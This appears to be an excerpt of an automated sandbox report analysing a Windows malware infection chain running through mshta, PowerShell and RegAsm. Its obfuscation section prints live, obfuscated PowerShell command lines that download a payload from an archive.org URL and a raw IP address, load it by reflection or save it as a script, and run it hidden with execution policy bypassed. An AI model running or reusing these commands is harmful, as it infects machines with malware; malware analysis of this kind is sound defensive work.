                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: TenantRestrictions\PayloaddConnRouteHelper.dllrfrvbpim.pdb source: powershell.exe, 00000003.00000002.2175384475.0000000007B40000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.pdb source: powershell.exe, 00000003.00000002.2169309335.000000000593F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                      Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 11_2_0041CBE1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_03743BD5 pushfd ; retf 3_2_03743BD9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_03743BCA pushfd ; retf 3_2_03743BD9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_07DC1FB2 push FFFFFF8Bh; iretd 3_2_07DC1FC5
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_07DC2506 push esp; iretd 3_2_07DC2515
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_07DC2228 push FFFFFF8Bh; iretd 3_2_07DC223B
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_07DC21EF push FFFFFF8Bh; iretd 3_2_07DC2202
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_07DC3009 push FFFFFF8Bh; retf 3_2_07DC301C
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_04AE6902 push esi; retf 9_2_04AE6907
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00457186 push ecx; ret 11_2_00457199
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0045E55D push esi; ret 11_2_0045E566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00457AA8 push eax; ret 11_2_00457AC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00434EB6 push ecx; ret 11_2_00434EC9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00406EEB ShellExecuteW,URLDownloadToFileW, 11_2_00406EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 11_2_0041AADB

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
